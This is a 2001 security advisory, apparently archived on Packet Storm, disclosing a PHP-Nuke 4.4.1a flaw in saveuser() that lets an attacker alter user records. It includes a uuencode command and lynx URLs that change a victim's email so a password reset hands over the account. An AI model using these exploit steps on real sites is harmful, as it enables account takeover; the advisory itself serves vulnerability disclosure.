exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

rdC270201.adv.en

rdC270201.adv.en
Posted Mar 3, 2001
Authored by venomous | Site rdcrew.com.ar

PHP-Nuke v4.4.1a contains remote vulnerabilities because arbitrary information can be passed to MySQL via the saveuser() function and several others. It's possible for the attacker to change the e-mail address of one of the users and ask for the password to be sent to the e-mail address that the attacker have provided. Exploit URL included.

tags | exploit, remote, arbitrary, php, vulnerability
SHA-256 | f3655876593a5a07c6c44ecd5198383aba17f78fc2b0cb266d390629ca65c07b

rdC270201.adv.en

Change Mirror Download
                    r 0 t t e n  d e v 1 c e  C r e w
r0tten dev1ce Crew

A r g e n t i n i a n S e c u r i t y G r o u p
Argentinian Security Group

<[( advisory )]>---------------------------------------<[( rdC270201.adv.en

Programa: PHP-NUKE
Vendor Homepage: http://www.phpnuke.org
Vendor Contacted: 27/feb/2001
Vendor Response: ??/??/??
Vendor Fix: ??/??/??
Version tested: 4.4.1a (latest version to date)
Found by: venomous
English translation: ka0z

- Problem description:
~~~~~~~~~~~~~~~~~~~~

The checks that are realized in the function saveuser() are not enough to
block abitrary information being passed to the query of MySQL.
[!] There are also many other functions that can be exploited the same way
described in the advisory. This adivisory describes only the function
saveuser().

- Impact:
~~~~~~~

It's possible for the attacker to change the e-mail address of one of the
users and ask for the password to be sent to the e-mail address that the
attacker have provided.
Of course this isn't easy since we do not know the UID of each of the
users, but this this type of information is easily obtained with
bruteforce checks.

- Exploit:
~~~~~~~~

powerhouse:~$ /bin/echo -e "0:<user>:2:3:4:5:6:7:8:eee" | uuencode -m f
begin-base64 644 f
MDpBbm9ueW1vdXM6MjozOjQ6NTo2Ojc6ODplZWUK [***]

lynx http://victim/user.php?op=saveuser&user=[***]&uid=X&uname=<user>

The variables you can change the value are:

name='',email='', femail='', url='', bio='' , user_avatar='',
user_icq='', user_occ='', user_from='', user_intrest='', user_sig='',
user_aim='', user_yim='', user_msnm=''

In other words, if we want to change the e-mail address, we do:

lynx
http://victim/user.php&op=saveuser&user=[***]&uid=X&uname=<user>&email=
<email you want>

If you ask for the password to be sent to e-mail, you would be able to
access the account.

- Code:
~~~~~

Very simple script to demostrate the vulnerability:

You can get it from http://www.rdcrew.com.ar, code section.

- Fix:
~~~~

Wait for a patch from the author.


- Contact us:
~~~~~~~~~~~

Advisories, tools, IDS, texts and other stuff can be found at:
http://www.rdcrew.com.ar


venomous@rdcrew.com.ar

- Greets:
~~~~~~~

people: ka0z, den0, E|Bruj0, storm, ab.
channels: #flatline at coredumped

[EOF]


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close